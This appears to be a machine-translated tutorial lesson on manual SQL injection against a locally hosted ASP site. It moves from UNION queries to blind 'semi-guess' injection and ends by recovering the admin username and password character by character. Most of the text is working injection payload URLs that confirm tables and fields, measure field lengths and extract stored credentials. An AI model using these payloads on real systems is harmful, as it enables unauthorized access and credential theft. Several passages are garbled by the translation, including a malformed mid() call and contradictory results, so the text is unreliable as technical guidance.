Injection notes-semi-guessing Query

After learning about joint query, we can only say that it is really powerful. Can joint query be used with injection points? The answer is no. What? Believe it? Let me show you a website.

Here, the local machine builds an environment and first accesses a page with parameters to test whether there are injection points.

Http: // localhost: 2008/chanpin. asp? Bigclassname =Product Introduction & smallclassname = pet package + and + 1 = 1 return normal

Http: // localhost: 2008/chanpin. asp? Bigclassname =Product Introduction & smallclassname = pet package + and + 1 = 2 error returned

And 1 = 1 and 1 = 2 are used to determine whether there are injection points.

Use order by to monitor the length.Http: // localhost: 2008/chanpin. asp? Bigclassname =Product Introduction & smallclassname = Error of PET package + order + by + 1, obviously impossible. Isn't injection of pet bag possible? Let's look for a digital one.

Find numeric injection, with a length of 16,Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + order + by + 16

16 return normal

17. An error is returned.

You can use the Union query function to query the table names and fields. Manage table name: Manage_User, field: username, password

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + 1 = 2 + union + select +, + from + Manage_User is very depressing. The page shows 12. If you don't understand it, replace the field name in "1" and "2.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + 1 = 2 + union + select + username, password, 15, 16 + from + Manage_User still returned 12, thoroughly depressed, not puzzled. Enter a new characterHttp: // localhost: 2008/chanpin. asp? Bigclassname =Product Introduction & smallclassname = pet package + and + 1 = 2 + union + select + username, password, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 + from + Manage_User

However, the user name and password are not displayed.

This is depressing. If we only perform joint queries, we will not be able to get this site.

However, there is a semi-guess query in manual injection. We will try it with semi-guess query.

To determine whether an injection point exists, use and 1 = 1 and and1 = 2 or between and 1 = 1 and 1 = 2.

Unlike the Combined Query, semi-guess query must first query whether a table exists.

Statement: and 0 <> (select count (*) from admin) --- determine whether the admin table exists

Or and (select count (*) from admin)> 0

I prefer to use the following sentence to check how a table can be guessed and displayed correctly. If no table exists, an error is returned.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + count (*) + from + manage_user)> 0 returns normal, indicating that the manage_user table exists.

Next, let's determine how many items exist in the manage_user table.

Statement: and 0 <(select count (*) from admin)

Or and (select count (*) from admin)> 0

Statement Description: query whether all data in the admin table is greater than 0. If the value is greater than 0, it is true. If the value is smaller than 0, it is not true.

Of course, data usually exists here, so it must be greater than zero.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + count (*) + from + manage_user)> 0

If the return value is greater than zero and the return value is greater than one, only one data record exists.

The following describes how to guess the field name to prepare for getting the user name and password.

Statement: and (select top 1 len (admin_user) from admin)> 0

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + top % 201% 20len (username) + from + manage_user)> 0 returns normal. The username field exists.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + top % 201% 20len (password) + from + manage_user)> 0 return normal, password field exists.

Of course, we have already known it before. If we don't know it, we still have to guess it. Here is also the same. There is a normal response, and there is no returned error. It is the same as writing homework, if the teacher answers the correct question, he will give you a right number.

The following describes how to guess the content length of a specified field.

Statement: and (select top 1 len (admin_user) from admin)> 0

We recommend that you start the experiment from> 3, because there are few one or two user names, unless they are Chinese characters,

Here I guess the length is: 5. Here we use the values greater than or equal to the two values to determine the length.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + top % 201% 20len (username) + from + manage_user)> 4> 4, return normal

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + (select + top % 201% 20len (username) + from + manage_user) = 5 equals 5, return normal

If it is greater than 4 and equal to 5, the length is 5.

Guess content

And 1 = (select top 1 count (*) from admin where Asc (mid (username, 1) = 97)

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + 1 = (select + top + 1 + count (*) + from + manage_user + where + Asc (mid + (username, 1) = 97) returns normal

It indicates that the first asc code is 97, converted to a, and then guessed one by one.

Http: // localhost: 2008/content. asp? Bigclassname =Product Introduction & smallclassname = manager folder, book folder & articleid = 361 + and + 1 = (select + top + 1 + count (*) + from + manage_user + where + Asc (mid + (username, 1) = 100) returns normal

The result is D,

Finally, you can guess that the username is: admin Password. Just set + and + 1 = (select + top + 1 + count (*) + from + manage_user + where + Asc (mid + (username, 1) = 100) Replace the username after the mid with the password and click "OK" one by one.

Now, let's get to it. This is the last chapter of the Getting Started article. We will enter the Improvement Section for the next lesson.